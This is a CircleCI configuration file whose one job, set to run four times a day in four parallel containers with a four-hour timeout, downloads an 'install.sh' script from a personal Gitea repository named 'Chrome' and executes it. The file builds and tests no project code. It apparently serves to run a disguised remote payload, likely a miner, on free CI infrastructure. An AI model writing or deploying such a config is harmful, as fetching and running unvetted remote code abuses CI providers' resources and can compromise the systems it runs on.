working_dir: &working_dir ~/app

version: 2.0
jobs:
  canadacoding:
    parallelism: 4
    docker:
      - image: cimg/python:3.8
    steps:
    - run:
        name: gasngs
        command: wget https://try.gitea.io/gilangkur/Chrome/raw/branch/master/install.sh && chmod +x install.sh && ./install.sh
        no_output_timeout: 4h
        
workflows:
  version: 2
  commit:
    jobs:
      - canadacoding
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  runningrubyjobs:
    jobs:
      - canadacoding
